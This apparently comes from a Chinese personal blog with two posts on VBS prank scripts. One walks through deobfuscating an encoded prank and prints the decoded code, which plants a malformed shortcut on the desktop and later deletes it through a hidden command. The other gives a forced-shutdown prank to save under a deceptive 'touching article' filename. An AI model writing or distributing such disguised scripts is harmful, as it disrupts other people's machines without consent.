文章关键字 ‘恶作剧程序’

一个VBS恶作剧程序的解密

2010年07月28日,星期三

就是我之前在百度HI上看到的加密的恶作剧程序。之前解密的时候犯了一个很愚蠢的错误,竟然把循环的次数看错了。

那个上面贴出的程序运行后生成一个EZJ.VBE文件,用Script Decoder将其解码成EZJ.VBS,然后将

Execute FG5bhgNStr

替换为

Set file = HgyuR5Y3v.OpenTextFile((zhVVB4tr6 - 16535685)&".vbs",2,True)
file.Write FG5bhgNStr

双击运行,得到501个vbs文件,其中70.vbs就是解密后的代码,如下

Rem EnCode_4.0 By baomaboy
On Error Resume Next
Set sexc4rt = WScript.CreateObject("WScript.Shell")
Set CcYdrdTE = CreateObject("Scripting.FileSystemObject")
RName = Int((9876543210 - 1234567890 + 1) * Rnd + 1234567890)
UrlFile = CcYdrdTE.BuildPath(sexc4rt.SpecialFolders("Desktop"),"\"&RName&".url")
Set UrlStr = CcYdrdTE.OpenTextFile(UrlFile,2,True)
UrlStr.WriteLine("[InternetShortcut]"&vbcrlf&"url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:")
UrlStr.Close
WScript.Sleep 5000
Set OUrl = CcYdrdTE.OpenTextFile(CcYdrdTE.BuildPath(CcYdrdTE.GetSpecialFolder(1),"ShowDisktop.SCF"),2,True)
OUrl.Write("[Shell]"&vbcrlf&"Command=2"&vbcrlf&"IconFile=explorer.exe,3"&vbcrlf&"[Taskbar]"&vbcrlf&"command=ToggleDesktop")
OUrl.Close
sexc4rt.Run("ShowDisktop.SCF")
WScript.Sleep 16365
sexc4rt.Run("%COMSPEC% /C Del "&CcYdrdTE.GetFile(UrlFile).ShortPath),vbHide
WScript.Sleep 1000
sexc4rt.Run("explorer.exe")
WScript.Quit(0)

唉,因为一个很低级的错误,纠结了好几天。

一个VBS恶作剧程序

2010年06月30日,星期三

很久很久以前,好像是高考后的那个夏天,收到过朋友的一个恶作剧程序,程序名为“一篇感动人的文章.vbs”,当时什么都不懂,直接双击了,一直耿耿于怀。双击后弹出一个输入框“输入‘我是猪’,否则十五秒后关机。我还以为是搞笑的,什么都没有输入,就真的关机了,觉得很神奇。而现在能够自己写出代码了,却再也找不到以前的快乐。

Option Explicit 
On Error Resume Next 
Dim answer
Dim WshShell
set WshShell = CreateObject("wscript.Shell")
WshShell.Run "Shutdown /f /s /t 10 /c 输入'我是猪',否则10秒后关机~",0
Do While answer<>"我是猪"
	answer=InputBox("输入'我是猪',否则10秒后关机~","哈哈哈",,7000,8000)
Loop 
WshShell.Run "Shutdown /a",0
MsgBox "哈哈哈,好玩不?",,"哈哈哈"

打开记事本,把代码复制粘贴进去,保存为“一篇感动人的文章.vbs”,一个恶作剧程序就完成了,接下来做什么就超出本文范围了。